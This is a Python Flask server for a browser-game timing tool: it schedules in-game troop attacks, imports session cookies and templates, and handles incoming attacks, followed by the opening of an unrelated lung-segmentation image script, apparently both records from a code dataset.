actions.append(action)\n return player, actions\n\ndef get_scheduled_data_db(attacks):\n # returns data by which a filter could be apllied\n sources = dict()\n targets = dict()\n #target_players = dict()\n stati = [\"active\", \"finished\",\"expired\", \"failed\"]\n \n if attacks:\n village_data = dict()\n for attack in attacks:\n if str(attack.source_id) not in sources:\n sources[str(attack.source_id)] = attack.source_name\n if str(attack.target_id) not in targets:\n targets[str(attack.target_id)] = attack.target_name\n if attack.player.domain not in village_data:\n village_data[attack.player.domain] = world_data.get_village_data(attack.player.domain)\n #target_player_id = None\n #for dataset in village_data[attack.player.domain]:\n # if attack.target_id == int(dataset[0]):\n # target_player_id = int(dataset[4])\n #if target_player_id:\n # if target_player_id not in target_players:\n # target_players[target_player_id] = world_data.get_player_name(attack.player.domain, target_player_id)\n #if attack.status not in stati:\n # stati.append(attack.status)\n return sources, targets, stati\n\ndef get_incomings_data(incs):\n # returns data by which a filter could be apllied\n sources = dict()\n targets = dict()\n source_players = dict()\n names = []\n units = []\n templates = dict()\n\n if incs:\n for inc in incs:\n if str(inc.source_village_id) not in sources:\n sources[str(inc.source_village_id)] = inc.source_village_name\n if str(inc.target_village_id) not in targets:\n targets[str(inc.target_village_id)] = inc.target_village_name\n if str(inc.source_player_id) not in source_players:\n source_players[str(inc.source_player_id)] = inc.source_player_name\n if inc.slowest_unit not in units:\n units.append(inc.slowest_unit)\n if inc.name not in names:\n names.append(inc.name)\n if inc.template:\n if str(inc.template.id) not in templates:\n templates[str(inc.template.id)] = inc.template.name\n elif \"None\" not in templates:\n templates[\"None\"] = \"Ignoriert\"\n data = dict(\n sources=sources,\n targets=targets,\n source_players=source_players,\n units=units, \n names=names,\n templates=templates)\n return data\n\n\ndef get_unitnames():\n return common.unitnames\n #return [\"spear\", \"sword\", \"axe\", \"archer\", \"spy\", \"light\", \"marcher\", \"heavy\", \"ram\", \"catapult\", \"knight\", \"snob\"]\n\n\ndef get_buildingnames():\n return common.buildingnames\n\n\ndef get_LZ_reduction():\n options = common.read_options()\n if options[\"LZ_reduction\"] != {}:\n return import_action.check_LZ(options[\"LZ_reduction\"])\n else:\n return {}\n\n\napp.jinja_env.globals.update(innocdn_url=innocdn_url, version=__version__, sids_status=sids_status,\n update=__needUpdate__, options=common.read_options(),\n get_LZ_reduction=get_LZ_reduction)\n\n\n@app.route(\"/static/\")\ndef static_files(path):\n return send_from_directory(\"static\", path)\n\n\n#def sort_unit_dict(dict):\n# units = {\"spear\":0, \"sword\":1, \"axe\":2, \"archer\":3, \"spy\":4, \"light\":5, \"marcher\":6, \"heavy\":7, \"ram\":8, \"catapult\":9, \"knight\":10, \"snob\":11}\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"erklaerbaer.html\")\n\n\n@app.route(\"/schedule\")\ndef schedule():\n player, actions = get_scheduled_actions()\n args = \"\"\n rev = \"\"\n if \"sort\" in request.args:\n args = request.args.get(\"sort\")\n rev = request.args.get(\"reverse\")\n if \"true\" in rev:\n rev_bool = True\n rev = \"false\"\n else:\n rev_bool = False\n rev = \"true\"\n if \"coord\" not in args:\n actions.sort(key=lambda x: x[args], reverse=rev_bool)\n else: #target_coords or source_coord\n actions.sort(key=lambda x: x[args][\"x\"], reverse=rev_bool)\n return render_template(\"schedule.html\", actions=actions, player=player, rev=rev)\n\n@app.route(\"/schedule_db\", methods=[\"GET\"])\ndef schedule_db():\n attacks = Attacks.query.order_by(\"departure_time\").all()\n templates = Template.query.all()\n sources, targets, stati = get_scheduled_data_db(attacks)\n filter_by = ast.literal_eval(request.args.get('filter_by') if request.args.get('filter_by') else \"{}\")\n order_by = request.args.get('order_by')\n if filter_by:\n query_filter_by = dict()\n # cant filter by unit, status, evac directly. \n if \"source_id\" in filter_by:\n query_filter_by[\"source_id\"] = filter_by[\"source_id\"]\n if \"target_id\" in filter_by:\n query_filter_by[\"target_id\"] = filter_by[\"target_id\"]\n\n attacks = Attacks.query.filter_by(**query_filter_by).order_by(\"departure_time\").all()\n\n if \"unit\" in filter_by:\n attacks = [attack for attack in attacks if filter_by[\"unit\"] in attack.get_units()]\n if \"evac\" in filter_by:\n if filter_by[\"evac\"] == \"1\":\n attacks = [attack for attack in attacks if attack.incs.all()]\n\n if \"status\" not in filter_by:\n attacks = [attack for attack in attacks if not attack.is_expired()]\n else:\n if filter_by[\"status\"] == \"active\":\n attacks = [attack for attack in attacks if not attack.is_expired()]\n elif filter_by[\"status\"] == \"expired\":\n attacks = [attack for attack in attacks if attack.status == \"expired\"]\n elif filter_by[\"status\"] == \"finished\":\n attacks = [attack for attack in attacks if attack.status == \"finished\"]\n else:\n attacks = [attack for attack in attacks if attack.status == \"failed\"]\n \n if order_by: # jaja noch sehr lui haft\n if \"arrival_time\" == order_by:\n attacks = sorted(attacks, key=lambda a: a.arrival_time)\n\n return render_template(\"schedule_db.html\", attacks = attacks, units = common.unitnames, sources = sources, targets = targets, stati = stati, filter_by = filter_by, buildings = common.buildingnames, templates = templates)\n\n@app.route(\"/schedule_db\", methods=[\"POST\"])\ndef schedule_db_post():\n type = request.form[\"type\"]\n current_filter_by = ast.literal_eval(request.args.get('filter_by') if request.args.get('filter_by') else \"{}\")\n filter_by = dict()\n if \"apply_filter\" in type:\n for filter in [name for name in request.form if \"filter_\" in name]:\n if request.form.get(filter) != \"default\":\n filter_by[filter.split(\"filter_by_\")[1]] = request.form.get(filter)\n return redirect(url_for(\"schedule_db\", filter_by=filter_by))\n elif \"delete__all\" in type:\n status = None\n if \"status\" in current_filter_by:\n status = current_filter_by[\"status\"]\n del current_filter_by[\"status\"]\n attacks = Attacks.query.filter_by(**current_filter_by).all()\n if status:\n if status == \"active\":\n attacks = [attack for attack in attacks if not attack.is_expired()]\n elif status == \"expired\":\n attacks = [attack for attack in attacks if attack.status == \"expired\"]\n elif status == \"finished\":\n attacks = [attack for attack in attacks if attack.status == \"finished\"]\n else:\n attacks = [attack for attack in attacks if attack.status == \"failed\"]\n for attack in attacks:\n db.session.delete(attack)\n elif \"delete__selected\" in type:\n for a_id in request.form.getlist(\"selected\"):\n attack = Attacks.query.filter_by(id = int(a_id)).first()\n db.session.delete(attack)\n elif \"delete_\" in type:\n attack = Attacks.query.filter_by(id = int(type.split(\"_\")[1])).first()\n db.session.delete(attack)\n elif \"edit_\" in type:\n id = type.split(\"_\")[1]\n attack = Attacks.query.filter_by(id = int(id)).first()\n \n if request.form.get(\"edit_template_\"+id) != \"default\":\n attack.template = Template.query.filter_by(id = int(request.form.get(\"edit_template_\"+id))).first()\n\n units = dict()\n for unit in common.unitnames:\n units[unit] = request.form.get(\"edit_unit_\"+unit+\"_\"+id) if request.form.get(\"edit_unit_\"+unit+\"_\"+id) != \"\" else 0\n \n if attack.template:\n if attack.template.get_units() != units:\n #template currently set, but now units changed manually -> delete relationship to template\n attack.template = None\n\n attack.units = str(units)\n\n if request.form.get(\"edit_template_\"+id) != \"default\":\n attack.template = Template.query.filter_by(id = int(request.form.get(\"edit_template_\"+id))).first()\n\n departure = dateutil.parser.parse(request.form.get(\"edit_departure_\"+id))\n arrival = dateutil.parser.parse(request.form.get(\"edit_arrival_\"+id))\n\n if departure != attack.departure_time or arrival != attack.arrival_time:\n duration = import_action.runtime(\n import_action.speed(attack.get_units(), attack.type, import_action.get_cached_unit_info(attack.player.domain)),\n import_action.distance(dict(x=attack.source_coord_x, y=attack.source_coord_y), dict(x=attack.target_coord_x, y=attack.target_coord_y)), attack.player.domain)\n\n if departure != attack.departure_time:\n attack.departure_time = departure\n attack.arrival_time = attack.departure_time + duration\n else:\n attack.arrival_time = arrival\n attack.departure_time = attack.arrival_time - duration\n \n attack.building = request.form.get(\"edit_building_\"+id)\n\n if attack.status != \"scheduled\" and not attack.is_expired():\n attack.status = \"scheduled\"\n \n attack.autocomplete()\n db.session.add(attack)\n elif \"apply_complex\" in type:\n diff = timedelta(\n hours = int(request.form.get(\"move_by_hours\")),\n minutes = int(request.form.get(\"move_by_minutes\")),\n seconds = int(request.form.get(\"move_by_seconds\")),\n microseconds = int(request.form.get(\"move_by_ms\"))*1000\n )\n template = request.form.get(\"set_template_all\")\n building = request.form.get(\"set_building_all\")\n \n for a_id in request.form.getlist(\"selected\"):\n attack = Attacks.query.filter_by(id = int(a_id)).first()\n if attack.status == \"pending\":\n continue\n attack.departure_time = attack.departure_time + diff\n attack.arrival_time = attack.arrival_time + diff\n if not attack.is_expired():\n attack.status = \"scheduled\"\n \n if template != \"default\":\n attack.template = Template.query.filter_by(id = int(template)).first()\n if building != \"default\":\n attack.building = building\n db.session.add(attack)\n \n db.session.commit()\n\n return redirect(url_for(\"schedule_db\", filter_by = ast.literal_eval(request.args.get('filter_by') if request.args.get('filter_by') else \"{}\")))\n\n@app.route(\"/schedule\", methods=[\"POST\"])\ndef schedule_post():\n schedule_path = os.path.join(os.path.expanduser(\"~\"), \".dstimer\", \"schedule\")\n trash_path = os.path.join(os.path.expanduser(\"~\"), \".dstimer\", \"trash\")\n type = request.form[\"type\"]\n if \"delete__all\" == type:\n delete_action.delete_all()\n return redirect(\"/schedule\")\n elif \"delete_\" in type:\n if delete_action.delete_single(id=type[7:len(type)]):\n return redirect(\"/schedule\") #reload\n return \"ok\"\n elif \"edit_\" in type:\n return redirect(\"/edit_action/\" + type.split(\"_\")[1])\n\n\n@app.route(\"/import\")\ndef import_action_get():\n return render_template(\"import_action.html\")\n\n\n@app.route(\"/import\", methods=[\"POST\"])\ndef import_action_post():\n try:\n text = request.form[\"text\"]\n if request.form[\"type\"] == \"action\":\n import_action.import_from_text(text=text, rand_mill=request.form.get(\"rand_mill\"))\n elif request.form[\"type\"] == \"keks\":\n import_keks.import_from_text(text)\n check_and_save_sids()\n world_data.refresh_world_data()\n return redirect(\"/dashboard\", code=302)\n except Exception as e:\n flash(\"{}: {}\".format(type(e).__name__, e))\n return redirect(url_for(\"import_action_get\", text=text))\n\n\n@app.route(\"/autoimport\", methods=[\"POST\"])\ndef autoimport_action_post():\n req_data = request.get_json()\n import_action.import_from_tampermonkey(action=req_data)\n return req_data\n\n\n@app.route(\"/wb\")\ndef wb_get():\n return render_template(\"workbench_import.html\", buildings=get_buildingnames())\n\n\n@app.route(\"/wb\", methods=[\"POST\"])\ndef wb_post():\n try:\n text = request.form[\"text\"]\n keks_path = os.path.join(common.get_root_folder(), \"keks\")\n playername = \"\"#request.form[\"playername\"]\n if request.form[\"type\"] == \"wb_template\":\n import_template.import_from_workbench(text)\n return redirect(\"/templates\")\n elif request.form[\"type\"] == \"wb_text\":\n import_action.import_wb_action(text, playername, request.form.get(\"catapult_target\"), request.form.get(\"action_type\"))\n elif request.form[\"type\"] == \"wb_html\":\n import_action.import_from_workbench_html(text, request.form.get(\"catapult_target\"), request.form.get(\"action_type\"))\n return redirect(\"/schedule_db\", code=302)\n except Exception as e:\n flash(str(e))\n #return redirect(url_for(\"wb_get\", text=text))\n return redirect(url_for(\"wb_get\"))\n\n\n@app.route(\"/logs\")\ndef logs():\n path = os.path.join(os.path.expanduser(\"~\"), \".dstimer\", \"logs\", \"dstimer.log\")\n with open(path) as file:\n logs = map(json.loads, reversed(file.read().splitlines()))\n return render_template(\"logs.html\", logs=logs)\n\n\n@app.route(\"/templates\", methods=[\"GET\"])\ndef templates_get():\n t = Template.query.all()\n name = request.args.get('name') if request.args.get('name') else \"\"\n units = ast.literal_eval(request.args.get('units') if request.args.get('units') else \"{}\")\n if not Template.query.filter_by(is_default= True).first():\n flash(\"Keine Standard Template gesetzt!\")\n return render_template(\"templates.html\", templates=t, unitnames=get_unitnames(), current_name = name, current_units = units)\n\n\n@app.route(\"/templates\", methods=[\"POST\"])\ndef templates_post():\n units = get_unitnames()\n templates = Template.query.all()\n type = request.form[\"type\"]\n if type == \"new_template\":\n template_units = {}\n for name in units:\n template_units[name] = request.form.get(\"new_template_unit_\"+name)\n t = Template()\n t.set_units(template_units)\n template_name = request.form.get(\"new_template_name\")\n for template in templates:\n if template_name == template.name:\n flash(\"Template name already used.\")\n return redirect(url_for(\"templates_get\", name=template_name, units = template_units))\n t.name = template_name\n db.session.add(t)\n elif \"delete_\" in type:\n id = int(type[7:len(type)])\n if id in [t.id for t in templates]:\n t = Template.query.filter_by(id=id).first()\n db.session.delete(t)\n elif \"set-default_\" in type:\n id = int(type.split(\"_\")[1])\n if id in [t.id for t in templates]:\n dt = Template.query.filter_by(is_default=True).first()\n if dt:\n dt.is_default = False\n db.session.add(dt)\n t = Template.query.filter_by(id=id).first()\n t.is_default = True\n db.session.add(t)\n elif \"edit_template_\" in type:\n id = type.split(\"_\")[2]\n t = Template.query.filter_by(id=int(id)).first()\n template_units = dict()\n for name in units:\n template_units[name] = request.form.get(\"new_template_unit_\"+name)\n t.set_units(template_units)\n template_name = request.form.get(\"new_template_name\")\n if template_name != t.name:\n for template in templates:\n if template_name == template.name:\n flash(\"Template name already used.\")\n return redirect(url_for(\"templates_get\", name=template_name, units = template_units))\n t.name = template_name\n db.session.add(t)\n\n db.session.commit()\n return redirect(\"/templates\")\n\n@app.route(\"/show///\", methods=[\"GET\"]) #TODO domain\ndef show(domain, type, id):\n player, actions = get_scheduled_actions()\n filtered_actions = []\n for action in actions:\n if str(action[type]) == id and action[\"domain\"] == domain:\n action[\"milliseconds\"] = int(action[\"arrival_time\"].microsecond / 1000)\n filtered_actions.append(action)\n return jsonify(filtered_actions)\n\n\n@app.route(\"/new_attack\", methods=[\"GET\"])\ndef new_atts_get():\n keks_path = os.path.join(common.get_root_folder(), \"keks\")\n players = []\n for folder in os.listdir(keks_path):\n for file in os.listdir(os.path.join(keks_path, folder)):\n s_file = file.split(\"_\", 1)\n players.append({\n \"domain\": folder,\n \"id\": s_file[0],\n \"name\": common.filename_unescape(s_file[1])\n })\n return render_template(\"new_attack.html\", templates=get_templates(), unitnames=get_unitnames(),\n players=players, N_O_P=len(players), buildings=get_buildingnames())\n\n\n@app.route(\"/new_attack\", methods=[\"POST\"])\ndef new_atts_post():\n action = {}\n action[\"source_coord\"] = {\"x\": request.form[\"source_x\"], \"y\": request.form[\"source_y\"]}\n action[\"target_coord\"] = {\"x\": request.form[\"target_x\"], \"y\": request.form[\"target_y\"]}\n unitnames = get_unitnames()\n action[\"units\"] = {}\n for name in unitnames:\n if request.form[name] != \"\":\n action[\"units\"][name] = request.form[name]\n if request.form.get(\"departure\"):\n action[\"departure_time\"] = request.form[\"time\"]\n else:\n action[\"arrival_time\"] = request.form[\"time\"]\n source_player = request.form.get(\"source_player_select\").split(\"+\")\n action[\"player_id\"] = source_player[0]\n action[\"domain\"] = source_player[1]\n action[\"source_id\"] = int(\n request.form.get(\"source_village\")\n if request.form.get(\"source_village\") != \"\" else world_data.get_village_id_from_coords(\n action[\"domain\"], action[\"source_coord\"][\"x\"], action[\"source_coord\"][\"y\"]))\n action[\"target_id\"] = int(\n request.form.get(\"target_village\")\n if request.form.get(\"target_village\") != \"\" else world_data.get_village_id_from_coords(\n action[\"domain\"], action[\"target_coord\"][\"x\"], action[\"target_coord\"][\"y\"]))\n action[\"type\"] = request.form[\"type\"]\n action[\"player\"] = world_data.get_player_name(action[\"domain\"], action[\"player_id\"])\n action[\"sitter\"] = \"0\"\n action[\"vacation\"] = \"0\"\n action[\"force\"] = False\n\n if request.form.get(\"save_default_attack_building\"):\n action[\"save_default_attack_building\"] = 1\n else:\n action[\"save_default_attack_building\"] = 0\n action[\"building\"] = request.form.get(\"catapult_target\")\n\n id = import_action.import_from_ui(action)\n return redirect(\"/schedule\") if action[\"type\"] != \"multiple_attacks\" else redirect(\n \"/add_attacks/\" + id)\n\n\n@app.route(\"/add_attacks/\")\ndef add_attacks(id):\n player, actions = get_scheduled_actions(\"temp_action\")\n for a in actions:\n if id == a[\"id\"]:\n action = a\n action[\"target_player\"] = world_data.get_player_name(\n action[\"domain\"], world_data.get_village_owner(action[\"domain\"],\n action[\"target_id\"]))\n break\n return render_template(\"add_attacks.html\", templates=get_templates(), unitnames=get_unitnames(),\n action=action)\n\n\n@app.route(\"/add_attacks/\", methods=[\"POST\"])\ndef add_attacks_post(id):\n NoA = int(request.form[\"type\"])\n player, actions = get_scheduled_actions(\"temp_action\")\n action = []\n for a in actions:\n if id == a[\"id\"]:\n a[\"departure_time\"] = str(a[\"departure_time\"]).replace(\" \", \"T\")\n del a[\"arrival_time\"]\n action.append(a)\n break\n min_time_diff = common.read_options()[\"min_time_diff\"]\n speed = import_action.speed(action[0][\"units\"], \"\",\n import_action.get_cached_unit_info(action[0][\"domain\"]))\n action[0][\"type\"] = \"attack\"\n for i in range(1, NoA + 1):\n a = action[0].copy()\n a[\"units\"] = {}\n for name in get_unitnames():\n n = name + \"_\" + str(i)\n if request.form[n] != \"\":\n a[\"units\"][name] = request.form[n]\n if speed != import_action.speed(a[\"units\"], \"\",\n import_action.get_cached_unit_info(a[\"domain\"])):\n logger.info(\"change in unitspeed after adding attack\")\n return redirect(\"/add_attacks/\" + id)\n departure = a[\"departure_time\"].split(\".\")\n if len(departure) == 1:\n departure.append(0)\n a[\"departure_time\"] = departure[0] + \".\" + str(\n int(departure[1]) + (1000 * i * min_time_diff))\n action.append(a)\n for i in range(1, NoA + 1):\n action[NoA - i][\"next_attack\"] = import_action.import_from_ui(action[NoA + 1 - i])\n import_action.import_from_ui(action[0])\n delete_action.delete_single(id, \"temp_action\")\n return redirect(\"/schedule\")\n\n\n@app.route(\"/new_attack_show/\")\ndef create_action_show(json_escaped):\n return\n\n\n@app.route(\"/edit_action/\", methods=[\"GET\"])\ndef edit_action_get(id):\n player, actions = get_scheduled_actions()\n action = {}\n for a in actions:\n if id == a[\"id\"]:\n action = a\n action[\"target_player\"] = world_data.get_player_name(\n action[\"domain\"], world_data.get_village_owner(action[\"domain\"],\n action[\"target_id\"]))\n break\n keks_path = os.path.join(common.get_root_folder(), \"keks\")\n players = []\n for folder in os.listdir(keks_path):\n for file in os.listdir(os.path.join(keks_path, folder)):\n s_file = file.split(\"_\", 1)\n players.append({\n \"domain\": folder,\n \"id\": s_file[0],\n \"name\": common.filename_unescape(s_file[1])\n })\n return render_template(\"edit_action.html\", players=players, action=action,\n unitnames=get_unitnames(), templates=get_templates(),\n buildings=get_buildingnames())\n\n@app.route(\"/edit_action/\", methods=[\"POST\"])\ndef edit_action_post(id):\n if request.form[\"type\"] == \"abbort\":\n return redirect(\"/schedule\")\n action = {}\n action[\"source_coord\"] = {\"x\": request.form[\"source_x\"], \"y\": request.form[\"source_y\"]}\n action[\"target_coord\"] = {\"x\": request.form[\"target_x\"], \"y\": request.form[\"target_y\"]}\n unitnames = get_unitnames()\n action[\"units\"] = {}\n for name in unitnames:\n if request.form[name] != \"\":\n action[\"units\"][name] = request.form[name]\n if request.form.get(\"departure\"):\n action[\"departure_time\"] = request.form[\"time\"]\n else:\n action[\"arrival_time\"] = request.form[\"time\"]\n source_player = request.form.get(\"source_player_select\").split(\"+\")\n action[\"player_id\"] = source_player[0]\n action[\"domain\"] = source_player[1]\n action[\"source_id\"] = int(\n request.form.get(\"source_village\")\n if request.form.get(\"source_village\") != \"\" else world_data.get_village_id_from_coords(\n action[\"domain\"], action[\"source_coord\"][\"x\"], action[\"source_coord\"][\"y\"]))\n action[\"target_id\"] = int(\n request.form.get(\"target_village\")\n if request.form.get(\"target_village\") != \"\" else world_data.get_village_id_from_coords(\n action[\"domain\"], action[\"target_coord\"][\"x\"], action[\"target_coord\"][\"y\"]))\n action[\"type\"] = request.form[\"type\"]\n action[\"player\"] = world_data.get_player_name(action[\"domain\"], action[\"player_id\"])\n action[\"sitter\"] = \"0\"\n action[\"vacation\"] = \"0\"\n action[\"force\"] = False\n\n if request.form.get(\"save_default_attack_building\"):\n action[\"save_default_attack_building\"] = 1\n else:\n action[\"save_default_attack_building\"] = 0\n action[\"building\"] = request.form.get(\"catapult_target\")\n\n import_action.import_from_ui(action, id=id)\n return redirect(\"/schedule\")\n\n\n@app.route(\"/villages_of_player//\")\ndef villages_of_player(domain, player_id):\n res = world_data.get_villages_of_player(domain, player_id=player_id)\n return jsonify(res)\n\n\n@app.route(\"/load_players/\")\ndef load_players(domain):\n res = world_data.get_players(domain)\n return jsonify(res)\n\n\n@app.route(\"/delete_action/\")\ndef delete_single_action(id):\n if delete_action.delete_single(id):\n return \"1\"\n\n\n@app.route(\"/options\", methods=[\"GET\"])\ndef options_get():\n return render_template(\"options.html\", templates=get_templates())\n\n\n@app.route(\"/options\", methods=[\"POST\"])\ndef options_post():\n options = common.read_options()\n if request.form[\"type\"] == \"refresh-world-data\":\n world_data.refresh_world_data()\n elif request.form[\"type\"] == \"kata-target\":\n logger.info(\"standard Kataziel ausgewählt: \" + request.form.get(\"kata-target-menu\"))\n options[\"kata-target\"] = request.form.get(\"kata-target-menu\")\n elif request.form[\"type\"] == \"reset-folders\":\n common.reset_folders()\n elif request.form[\"type\"] == \"donate_toogle\":\n options[\"show_donate\"] = not options[\"show_donate\"]\n elif request.form[\"type\"] == \"LZ_reduction\":\n new_LZ = {\n \"until\": request.form.get(\"LZ_reduction_until\"),\n \"player\": request.form.get(\"LZ_reduction_target_input\"),\n \"magnitude\": request.form.get(\"LZ_reduction_percent_input\"),\n \"domain\": request.form.get(\"LZ_reduction_domain_input\")\n }\n options[\"LZ_reduction\"] = import_action.check_LZ(new_LZ)\n elif request.form[\"type\"] == \"LZ_reduction_delete\":\n options[\"LZ_reduction\"] = {}\n elif request.form[\"type\"] == \"min_time_diff\":\n options[\"min_time_diff\"] = int(request.form.get(\"min_time_diff\"))\n elif request.form[\"type\"] == \"evac_template\":\n options[\"evac_template\"] = request.form.get(\"evac_template\")\n common.write_options(options)\n app.jinja_env.globals.update(options=options)\n return redirect(\"/options\")\n\n@app.route(\"/keks_overview\", methods = [\"GET\"])\ndef keks_overview():\n players = Player.query.all()\n return render_template(\"keks_overview.html\", players = players) \n\n\n@app.route(\"/incomings//\", methods=[\"GET\"])\ndef incomings_get(domain, player_id):\n player = Player.query.filter_by(domain=domain, player_id=player_id).first_or_404()\n incs = Incomings.query.filter_by(player = player).order_by(\"arrival_time\").all()\n templates = Template.query.all()\n filter_by = ast.literal_eval(request.args.get('filter_by') if request.args.get('filter_by') else \"{}\")\n data = get_incomings_data(incs)\n if filter_by:\n if \"source_id\" in filter_by:\n incs = [inc for inc in incs if inc.source_village_id == int(filter_by[\"source_id\"])]\n if \"target_id\" in filter_by:\n incs = [inc for inc in incs if inc.target_village_id == int(filter_by[\"target_id\"])]\n if \"source_player_id\" in filter_by:\n incs = [inc for inc in incs if inc.source_player_id == int(filter_by[\"source_player_id\"])]\n if \"slowest_unit\" in filter_by:\n incs = [inc for inc in incs if inc.slowest_unit == filter_by[\"slowest_unit\"]]\n if \"template\" in filter_by:\n if filter_by[\"template\"] != \"None\":\n incs = [inc for inc in incs if inc.template if inc.template.id == filter_by[\"template\"]]\n else:\n incs = [inc for inc in incs if not inc.template]\n if \"name\" in filter_by:\n incs = [inc for inc in incs if filter_by[\"name\"] in inc.name]\n return render_template(\"incomings.html\", player = player, incs = incs, filter_by = filter_by, data = data, templates = templates)\n\n@app.route(\"/incomings//\", methods=[\"POST\"])\ndef incomings_post(domain, player_id):\n type = request.form[\"type\"]\n\n current_filter_by = ast.literal_eval(request.args.get('filter_by') if request.args.get('filter_by') else \"{}\")\n filter_by = dict()\n if \"apply_filter\" in type:\n for filter in [name for name in request.form if \"filter_\" in name]:\n if request.form.get(filter) != \"default\" and request.form.get(filter) != \"\":\n filter_by[filter.split(\"filter_by_\")[1]] = request.form.get(filter)\n return redirect(url_for(\"incomings_get\", domain = domain, player_id = player_id, filter_by=filter_by))\n return redirect(url_for(\"incomings_get\", domain = domain, player_id = player_id, filter_by = current_filter_by))\n\n@app.route(\"/inc_options//\", methods=[\"GET\"])\ndef inc_options(domain, player_id):\n p = Player.query.filter_by(player_id=player_id, domain = domain).first_or_404()\n p.refresh_groups()\n i = Inctype.query.all()\n t = Template.query.all()\n return render_template(\"inc_options.html\", templates = t, player = p, inctypes = i)\n\n@app.route(\"/inc_options//\", methods=[\"POST\"])\ndef inc_options_post(domain, player_id):\n p = Player.query.filter_by(player_id=player_id, domain = domain).first_or_404()\n i = Inctype.query.all()\n\n if request.form[\"type\"] == \"add_group\":\n g = p.groups.filter_by(group_id=request.form.get(\"add_group_menu\")).first()\n priority = int(request.form.get(\"add_group_priority\"))\n if priority not in p.get_used_group_priorities():\n g.is_used = True\n g.priority = priority\n db.session.add(g)\n else:\n flash(\"Priorität {} bereits besetzt von Gruppe [{}].\".format(priority, p.groups.filter_by(is_used=True, priority=priority).first().name))\n \n elif request.form[\"type\"] == \"submit_changes\":\n # mark groups as unused\n delete_groups = [int(group_id) for group_id in request.form.getlist(\"delete_group\")]\n for group_id in delete_groups:\n g = p.groups.filter_by(group_id=group_id).first()\n g.is_used = False\n g.priority = None\n db.session.add(g)\n formnames = [name for name in request.form if \"use-template_\" in name]\n ignore = [name.split(\"_\") for name in request.form.getlist(\"ignore\")]\n for name in formnames:\n t_id = request.form.get(name)\n [group_id, inc_id] = name.split(\"_\")[1:]\n group = Group.query.filter_by(group_id = group_id).first()\n inctype = Inctype.query.filter_by(id = inc_id).first()\n\n e = Evacoption.query.filter_by(group = group, inctype = inctype).first()\n if not e:\n e = Evacoption(\n group = group, \n inctype = inctype, \n )\n e.template = Template.query.filter_by(id = t_id).first()\n e.is_ignored = [group_id, inc_id] in ignore\n\n db.session.add(e)\n \n elif request.form[\"type\"] == \"refresh_groups\":\n p.refresh_groups(1)\n\n elif request.form[\"type\"] == \"activate\":\n p.evac_activated = not p.evac_activated\n\n db.session.commit()\n return redirect(url_for(\"inc_options\", domain=domain, player_id=player_id))\n\n@app.route(\"/dashboard\", methods=[\"GET\"])\ndef dashboard_get():\n players = Player.query.all()\n atts = dict()\n incs = dict()\n for player in players:\n attacks = Attacks.query.filter_by(player=player).all()\n incomings = Incomings.query.filter_by(player=player).all()\n # counting amount of scheduled+pending, finished, exprired, failed atts\n NO_active = len([attack for attack in attacks if not attack.is_expired()]) \n NO_finished = len([attack for attack in attacks if attack.status == \"finished\"])\n NO_expired = len([attack for attack in attacks if attack.status == \"expired\"])\n NO_failed = len([attack for attack in attacks if attack.status == \"failed\"])\n NO_incs = len(incomings)\n NO_ignored_incs = len([incoming for incoming in incomings if not incoming.template])\n\n atts[player.id] = dict(\n active = {\"NO\" : NO_active, \"badge\" : \"\", \"filter_by\" : str(dict(status = \"active\"))},\n finished = {\"NO\" : NO_finished, \"badge\" : \"alert-success\", \"filter_by\" : str(dict(status = \"finished\"))},\n expired = {\"NO\" : NO_expired, \"badge\" : \"alert-warning\", \"filter_by\" : str(dict(status = \"expired\"))},\n failed = {\"NO\" : NO_failed, \"badge\" : \"alert-danger\", \"filter_by\" : str(dict(status = \"failed\"))}\n )\n incs[player.id] = dict(\n incs = NO_incs,\n ignored = NO_ignored_incs\n )\n if not Template.query.filter_by(is_default= True).first():\n flash(\"Keine Standard Template gesetzt!\")\n\n return render_template(\"dashboard.html\", players=players, atts=atts, incs = incs)\n\n@app.route(\"/dashboard\", methods=[\"POST\"])\ndef dashboard_post():\n if request.form.get(\"type\") == \"restart\":\n restart.restart_program()\n\n@app.route(\"/add_inc//\", methods=[\"GET\"])\ndef add_inc(domain, player_id):\n player = Player.query.filter_by(domain = domain, player_id = player_id).first()\n villages = Village.query.filter_by(player = player).all()\n return render_template(\"add_inc.html\", player = player, villages = villages, now = datetime.now()+timedelta(minutes=1))\n\n@app.route(\"/add_inc//\", methods=[\"POST\"])\ndef add_inc_post(domain, player_id):\n source_id = request.form.get(\"source\")\n target_id = request.form.get(\"target\")\n arrival = dateutil.parser.parse(request.form.get(\"arrival\"))\n inc_id = 684\n incomings_handler.create_test_inc(domain, player_id, source_id, target_id, arrival, inc_id)\n return redirect(url_for(\"incomings_get\", domain = domain, player_id = player_id))\n\n","repo_name":"st4bel/DS_Timer","sub_path":"dstimer/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":37971,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"1212532997","text":"from matplotlib import pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom PIL import Image\nfrom skimage import measure, color\nfrom scipy import ndimage\nimport cv2\n\nimport scipy.io as scio\n\ndef lung_9mask_old(lungs_seg):\n lungs_prespective = np.sum(lungs_seg, 1)\n lungs_prespective = np.array(lungs_prespective, dtype= bool)\n save_np = Image.fromarray(lungs_prespective)\n save_np.save('lungs_prespective.png')\n slience = lungs_prespective.shape[0]\n top_slience = 0\n down_slience = slience\n left_edge = []\n right_edge = []\n for i in range(slience):\n if top_slience == 0 and np.sum(lungs_prespective[i]):\n top_slience = i\n if top_slience != 0 and np.sum(lungs_prespective[i])==0:\n down_slience = 0\n if np.sum(lungs_prespective[i]):\n for j in range(lungs_prespective.shape[1]):\n if lungs_prespective[i, j]:\n if left_edge and left_edge[-1][0] != i - 1:\n if len(left_edge)>10:\n break\n else:\n left_edge = []\n\n left_edge.append([i, j])\n break\n for j in range(lungs_prespective.shape[1]):\n if lungs_prespective[i, lungs_prespective.shape[1] - j - 1]:\n if right_edge and right_edge[-1][0] != i - 1:\n if len(right_edge)>10:\n break\n else:\n right_edge = []\n right_edge.append([i, lungs_prespective.shape[1] - j])\n break\n \n left_edge, right_edge = np.array(left_edge), np.array(right_edge)\n left_outp = np.argmin(left_edge[:,1])\n right_outp = np.argmax(right_edge[:, 1])\n left_edge, right_edge = left_edge[left_outp:], right_edge[right_outp:]\n f_left = np.polyfit(left_edge[:, 0], left_edge[:, 1], 2)\n f_l = np.poly1d(f_left)\n y_l = f_l(left_edge[:, 0])\n # plt.plot(left_edge[:, 0], y1, label='fit 